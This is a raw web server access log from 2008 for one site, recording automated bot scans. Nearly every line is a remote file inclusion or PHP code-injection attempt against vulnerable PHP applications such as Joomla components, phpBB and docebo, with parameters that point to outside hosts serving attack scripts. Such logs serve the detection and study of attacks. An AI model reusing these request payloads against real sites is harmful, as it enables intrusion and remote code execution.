89.42.133.2 - - [02/May/2008:11:30:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:30:50 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.109.12 - - [02/May/2008:11:31:00 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:11:31:14 -0700] "GET //skin/zero_vote/error.php?dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.153.202 - - [02/May/2008:11:31:20 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.153.202 - - [02/May/2008:11:31:20 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.153.202 - - [02/May/2008:11:31:21 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.48.74.30 - - [02/May/2008:11:31:22 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.74.30 - - [02/May/2008:11:31:23 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.74.30 - - [02/May/2008:11:31:23 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:31:35 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:31:39 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:31:40 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:32:14 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:32:15 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:32:15 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:32:29 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:32:29 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:32:30 -0700] "GET /logs/access_080227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:32:31 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:32:31 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:32:32 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:32:36 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:32:36 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:32:37 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:32:37 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:32:41 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:32:42 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.97.201.148 - - [02/May/2008:11:32:54 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:32:57 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:32:57 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:32:57 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.153.202 - - [02/May/2008:11:33:02 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:33:02 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:33:08 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:33:09 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:33:10 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:33:11 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:33:11 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:33:12 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:33:13 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:33:16 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:33:17 -0700] "GET //Neos_Chronos/header.php?base_folder=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:33:18 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:33:33 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.156.59 - - [02/May/2008:11:33:36 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.156.59 - - [02/May/2008:11:33:36 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.156.59 - - [02/May/2008:11:33:36 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.156.59 - - [02/May/2008:11:33:39 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.156.59 - - [02/May/2008:11:33:40 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.156.59 - - [02/May/2008:11:33:40 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.227.209.138 - - [02/May/2008:11:33:41 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:33:45 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:33:45 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:33:45 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:33:55 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:33:55 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:33:56 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:33:57 -0700] "GET /logs/access_080113.log/content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:33:57 -0700] "GET /content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:33:58 -0700] "GET /logs/content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:34:06 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:34:06 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:34:07 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:34:23 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:34:24 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 200 34 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:34:24 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.250.234.226 - - [02/May/2008:11:34:28 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.207.204.13 - - [02/May/2008:11:34:28 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [02/May/2008:11:34:29 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [02/May/2008:11:34:32 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:34:34 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:34:35 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:34:35 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:34:36 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:34:36 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:34:37 -0700] "GET //Neos_Chronos/header.php?base_folder=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:34:37 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:11:34:47 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:11:34:47 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:11:34:47 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:11:34:47 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:11:34:47 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:11:34:47 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:11:34:47 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:11:34:47 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:11:34:47 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:11:34:48 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:11:34:48 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.89.217 - - [02/May/2008:11:34:48 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.156.59 - - [02/May/2008:11:34:49 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:34:50 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.156.59 - - [02/May/2008:11:34:50 -0700] "GET //config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:34:50 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.156.59 - - [02/May/2008:11:34:50 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:34:50 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:34:52 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:34:56 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:35:05 -0700] "GET /logs/access_080213.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:35:05 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:35:05 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:11:35:06 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:35:10 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:35:10 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:35:11 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:11:35:15 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:35:16 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:35:16 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:35:18 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:35:18 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
